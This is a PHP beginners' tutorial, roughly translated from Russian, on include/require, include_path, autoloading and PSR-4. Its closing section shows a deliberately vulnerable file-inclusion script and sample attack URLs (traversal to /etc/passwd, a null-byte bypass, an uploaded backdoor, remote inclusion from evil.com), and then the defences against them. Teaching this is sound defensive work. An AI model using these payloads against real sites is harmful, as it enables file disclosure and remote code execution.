PHP for beginners. File attachment

  • Tutorial
image


In the continuation of the series "PHP for beginners", today's article will be devoted to how PHP searches and connects files.

Why and why


PHP is a scripting language that was originally created to quickly sculpt home pages (yes, yes, it was originally P ersonal H ome Page Tools), and later on it began to create shops, social projects and other crafts on the knee that go beyond the plan, but why am I - and the fact that the more functionality is coded, the greater the desire to structure it, get rid of from duplication of code, break into logical pieces and connect only when necessary (this is the same feeling that you had when you read this sentence, it could be broken into separate pieces). For this purpose in PHP there are several functions, the general meaning of which comes down to the connection and interpretation of the specified file. Let's look at the example of connecting files:

// file variable.php
$a = 0;
// file increment.php
$a++;
// file index.phpinclude ('variable.php');
include ('increment.php');
include ('increment.php');
echo $a;

If you run the script index.php , then PHP will all be consistently connected and executed:

$a = 0;
$a++;
$a++;
echo $a; // выведет 2

When a file is connected, its code is in the same scope as the line in which it was connected, so all variables available in this line will be available in the included file. If classes or functions were declared in the included file, then they fall into the global scope (unless of course a namespace was specified for them).

If you connect a file inside a function, the included files will access the function scope, so the following code will also work:

function(){
    $a = 0;
    include ('increment.php');
    include ('increment.php');
    echo $a;
}
a(); // выведет 2

Separately, I note Magic constants : __DIR__, __FILE__, __LINE__and others - they are bound to the context and implemented before there is an inclusion
The peculiarity of connecting files is that when connecting a file, parsing switches to HTML mode, for this reason, any code inside the included file must be enclosed in PHP tags:

<?php// подключаемый код// ...//?>

If you have only PHP code in the file, then the closing tag is usually omitted in order not to accidentally forget which thread the characters after the closing tag, which is fraught with problems (I will tell you more about this in the next article).
Have you seen the site file for 10,000 lines? Already tears in the eyes (╥_╥) ...

File connection functions


As mentioned above, in PHP there are several functions for connecting files:

  • include - includes and executes the specified file; if it does not find it, it gives a warningE_WARNING
  • include_once - similar to the function above, but includes the file once
  • require - includes and executes the specified file; if it does not find it, it produces a fatal error.E_ERROR
  • require_once - similar to the function above, but includes the file once

In fact, these are not exactly functions, they are special language constructs, and you can use not parentheses. Among other things, there are other ways to connect and execute files, but this is already digging, let it be for you "task with an asterisk";)
Let's look at examples of the differences between requireand require_oncetake one echo.php file :

<p>text of file echo.php</p>

And we will connect it several times:

<?php// подключит и выполнит файл// вернёт 1require_once'echo.php';
// файл не будет подключён, т.к. уже подключали// вернёт truerequire_once'echo.php';
// подключит и выполнит файл// вернёт 1require'echo.php';

The result of the execution will be two connections file echo.php :

<p>text of file echo.php</p><p>text of file echo.php</p>

There are a couple of directives that affect the connection, but you will not need them - auto_prepend_file and auto_append_file . These directives allow you to set files that will be connected before connecting all files and after running all scripts, respectively. I can't even come up with a “live” script when it may be required.

The task
Таки придумать и реализовать сценарий по использованию директив auto_prepend_file и auto_append_file, менять их можно только в php.ini, .htaccess или httpd.conf (см. PHP_INI_PERDIR) :)

Where is looking?


PHP searches for include files in directories specified in the include_path directive . This directive also affects the operation of functions fopen(), file(), readfile()and file_get_contents(). The algorithm works quite simple - when searching for files, PHP checks each directory in turn include_path, until it finds the included file, if it does not, it will return an error. To change include_pathfrom the script, use the set_include_path () function .

When setting up include_path, one important point should be taken into account - as the separator of paths in Windows and Linux, various symbols are used - ";" and ":" respectively, so when specifying your directory, use a constant PATH_SEPARATOR, for example:

// пример пути в linux
$path = '/home/dev/library';
// пример пути в windows
$path = 'c:\Users\Dev\Library';
// для linux и windows код изменение include_path идентичный
set_include_path(get_include_path() . PATH_SEPARATOR . $path);

When you write include_pathin the ini file, you can use environment variables of the type ${USER}: If you attach an absolute path (starting with "/") or relative (starting with "." Or "..") when connecting a file, the directive will be ignored, and the search will be performed only at the specified path.

include_path = ".:${USER}/my-php-library"


include_path
Perhaps it would be worthwhile to tell about safe_mode , but this is a long history (from version 5.4), and I hope you will not encounter it, but if you suddenly, so that you know what it was, but passed ...

Use return


I'll tell you about a small life-hack - if a plug-in file returns something using a construction return, then this data can be obtained and used, so you can easily organize the connection of configuration files, I will give an example for clarity:

return [
    'host' => 'localhost',
    'user' => 'root',
    'pass' => ''
];

$dbConfig = require'config/db.php';
var_dump($dbConfig);
/*
array(
  'host' => 'localhost',
  'user' => 'root',
  'pass' => ''
)
*/

Interesting facts, without which life was so good: if functions are defined in the included file, then they can be used in the main file regardless of whether they were declared before return or after
The task
Написать код, который будет собирать конфигурацию из нескольких папок и файлов. Структура файлов следующая:

config
|-- default
|  |-- db.php
|  |-- debug.php
|  |-- language.php
|  `-- template.php
|-- development
|  `-- db.php
`-- production
   |-- db.php
   `-- language.php

При этом код должен работать следующим образом:

  • если в системном окружении есть переменная PROJECT_PHP_SERVER и она равна development, то должны быть подключены все файлы из папки default, данные занесены в перемененную $config, затем подключены файлы из папки development, а полученные данные должны перетереть соответствующие пункты сохраненные в $config
  • аналогичное поведение если PROJECT_PHP_SERVER равна production (естественно только для папки production)
  • если переменной нет, или она задана неверно, то подключаются только файлы из папки default


Automatic connection


Constructs with the connection of files look very cumbersome, and also monitor their updating - even that present, check out a piece of code from the example of the article about exceptions :

// load all files w/out autoloaderrequire_once'Education/Command/AbstractCommand.php';
require_once'Education/CommandManager.php';
require_once'Education/Exception/EducationException.php';
require_once'Education/Exception/CommandManagerException.php';
require_once'Education/Exception/IllegalCommandException.php';
require_once'Education/RequestHelper.php';
require_once'Education/Front.php';

The first attempt to avoid such “happiness” was the emergence of the __autoload function . To say more precisely, it was not even a specific function, you had to define this function yourself, and already with its help it was necessary to include the files we need by the class name. The only rule was that for each class a separate file should be created by the class name (i.e., myClass should be inside the file myClass.php ). Here is an example of the implementation of such a function __autoload()(taken from the comments to the official manual):

The class that we will connect:

// класс myClass в отдельном файле myClass.phpclassmyClass{
    publicfunction__construct(){
        echo"myClass init'ed successfuly!!!";
    }
}

The file that connects this class:

// пример реализации// ищем файлы согласно директивы include_pathfunction__autoload($classname){
    $filename = $classname .".php";
    include_once $filename;
}
// создаём класс
$obj = new myClass();

Now about the problems with this function - imagine the situation that you are connecting a third-party code, and there someone has already registered a function __autoload()for your code, and voila:

Fatal error: Cannot redeclare __autoload()

To avoid this, a function was created that allows you to register an arbitrary function or method as a class loader - spl_autoload_register . Those. we can create several functions with an arbitrary name to load classes, and register them with spl_autoload_register. Now it index.phpwill look like this:

// пример реализации// ищем файлы согласно директивы include_pathfunctionmyAutoload($classname){
    $filename = $classname .".php";
    include_once($filename);
}
// регистрируем загрузчик
spl_autoload_register('myAutoload');
// создаём класс
$obj = new myClass();

“Did you know?” Rubric: the first parameter spl_autoload_register()is optional, and calling the function without it, the spl_autoload function will be used as a loader , the search will be carried out in folders from include_pathand files with the extension .phpand .inc, but this list can be expanded using the spl_autoload_extensions function
Now each developer can register his own loader, the main thing is that the class names do not match, but this should not be a problem if you use namespaces.
Since such an advanced functionality has existed for a long time spl_autoload_register(), the function __autoload()has already been declared as deprecated in PHP 7.1 , which means that in the foreseeable future this function will be removed altogether (X_x)
Well, more or less, the picture cleared up, although, wait a minute, all registered loaders queued up as they were registered, respectively, if someone nakhimichil in his loader, instead of the expected result, you can get a very unpleasant bug. To prevent this from happening, adult smart guys described a standard that allows you to connect third-party libraries without problems, the main thing is that the organization of classes in them complies with the PSR-0 standard (10 years old as already) or PSR-4 . What is the essence of the requirements described in the standards:

  1. Each library must live in its own namespace (the so-called vendor namespace)
  2. A separate folder must be created for each namespace.
  3. Inside the namespace can be their subspaces - also in separate folders
  4. One class - one file
  5. The file name with the extension .phpmust exactly match the class name

Example from the manual:
Full class nameNamespaceBase directoryFull path
\ Acme \ Log \ Writer \ File_WriterAcme \ Log \ Writer./acme-log-writer/lib/./acme-log-writer/lib/File_Writer.php
\ Aura \ Web \ Response \ StatusAura \ Web/ path / to / aura-web / src //path/to/aura-web/src/Response/Status.php
\ Symfony \ Core \ RequestSymfony \ core./vendor/Symfony/Core/./vendor/Symfony/Core/Request.php
\ Zend \ AclZend/ usr / includes / Zend //usr/includes/Zend/Acl.php


The differences between these two standards are only in the fact that PSR-0 supports the old code without a namespace (i.e., prior to version 5.3.0), and PSR-4 is spared from this anachronism, and even avoids unnecessary nesting of folders.

Thanks to these standards, it became possible the emergence of such a tool as composer - the universal package manager for PHP. If someone missed, then there is a good report from pronskiy about this tool.


PHP injection


I also wanted to tell about the first mistake of everyone who makes a single entry point for a site in one index.phpand calls it an MVC framework:

<?php
$page = $_GET['page'] ?? die('Wrong filename');
if (!is_file($page)) {
    die('Wrong filename');
}
include $page;

You look at the code, and you want something to send a malicious thread there:

// получить неожиданное поведение системы
http://domain.com/index.php?page=../index.php
// прочитать файлы в директории сервера
http://domain.com/index.php?page=config.ini
// прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd
// запустить файлы, которые мы заранее залили на сервер
http://domain.com/index.php?page=user/backdoor.php

The first thing that comes to mind is to forcefully add an extension .php, but in some cases it can be circumvented “thanks” to the zero byte vulnerability (read, this vulnerability has long been fixed , but suddenly you get an interpreter older than PHP 5.3, well, for general development I also recommend):

// прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd%00

In modern versions of PHP, the presence of a zero byte character in the path of the included file immediately leads to a corresponding connection error, and even if the specified file exists and can be connected, there will always be an error as a result, this is checked as follows strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename)(this is from the depth of PHP itself)
The second “worthwhile” thought is a check to find the file in the current directory:

<?php
$page = $_GET['page'] ?? die('Wrong filename');
if (strpos(realpath($page), __DIR__) !== 0) {
    die('Wrong path to file');
}
include $page . '.php';

The third, but not the last modification of the check, is the use of the open_basedir directive , with its help you can specify the directory where PHP will look for the files to connect:

<?php
$page = $_GET['page'] ?? die('Wrong filename');
ini_set('open_basedir', __DIR__);
include $page . '.php';

Be careful, this directive affects not only the connection of files, but also all the work with the file system, i.e. including this restriction you should be sure not to forget anything outside the specified directory or cached data, nor any user files (although the functions is_uploaded_file()and move_uploaded_file()will continue to work with a temporary folder for downloaded files).
What other checks are possible? Lots of options, it all depends on the architecture of your application.

I also wanted to recall the existence of the “wonderful” directive allow_url_include (it has a dependency on allow_url_fopen ), it allows you to connect and execute remote PHP files, which is much more dangerous for your server:

// подключаем удалённый PHP скрипт
http://domain.com/index.php?page=http://evil.com/index.php

They saw, remembered, and never use, the benefit is off by default. You will need this opportunity a little less than never, in all other cases, lay the correct application architecture, where different parts of the application communicate through the API.

The task
Написать скрипт, который позволит подключать php-скрипты из текущей папки по названию, при этом следуют помнить о возможных уязвимостях и не допустить промашек.

Finally


This article is a basic foundation in PHP, so study carefully, do the tasks and do not filon; no one will teach for you.

PS


This is a repost from the PHP For Beginners series:


If you have comments on the material of the article, or perhaps on the form, then describe the essence in the comments, and we will make this material even better.

Also popular now: